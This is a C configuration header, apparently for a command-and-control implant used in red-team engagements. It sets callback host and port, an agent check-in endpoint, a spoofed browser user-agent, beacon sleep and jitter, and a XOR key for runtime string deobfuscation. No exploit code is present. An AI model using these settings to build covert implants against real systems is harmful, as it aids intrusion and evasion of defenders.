#ifndef CONFIG_H
#define CONFIG_H

/* ── Per-build overrides ──────────────────────────────────────────────
 * config.local.h is git-ignored and generated by PayloadFactory for
 * each engagement.  Any #define below can be overridden there.
 */
#if __has_include("config.local.h")
  #include "config.local.h"
#endif

/* ── Callback defaults (overridden by config.local.h) ─────────────── */
#ifndef CALLBACK_HOST
  #define CALLBACK_HOST        L"127.0.0.1"
#endif

#ifndef CALLBACK_PORT
  #define CALLBACK_PORT        443
#endif

#ifndef CALLBACK_ENDPOINT
  #define CALLBACK_ENDPOINT    L"/api/agents"
#endif

#ifndef CALLBACK_USERAGENT
  #define CALLBACK_USERAGENT   L"Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
#endif

/* ── Timing ───────────────────────────────────────────────────────── */
#ifndef SLEEP_INTERVAL_MS
  #define SLEEP_INTERVAL_MS    30000   /* 30 seconds */
#endif

#ifndef JITTER_PERCENT
  #define JITTER_PERCENT       20      /* ±20 % */
#endif

/* ── Identity ─────────────────────────────────────────────────────── */
#ifndef AGENT_ID_PREFIX
  #define AGENT_ID_PREFIX      "AGENT"
#endif

/* ── Crypto ───────────────────────────────────────────────────────── */
#ifndef SESSION_KEY_SEED_LEN
  #define SESSION_KEY_SEED_LEN 32
#endif

/* XOR key used to deobfuscate embedded strings at runtime.
 * PayloadFactory randomises this per build.                          */
#ifndef XOR_KEY
  #define XOR_KEY              0x55
#endif

#endif /* CONFIG_H */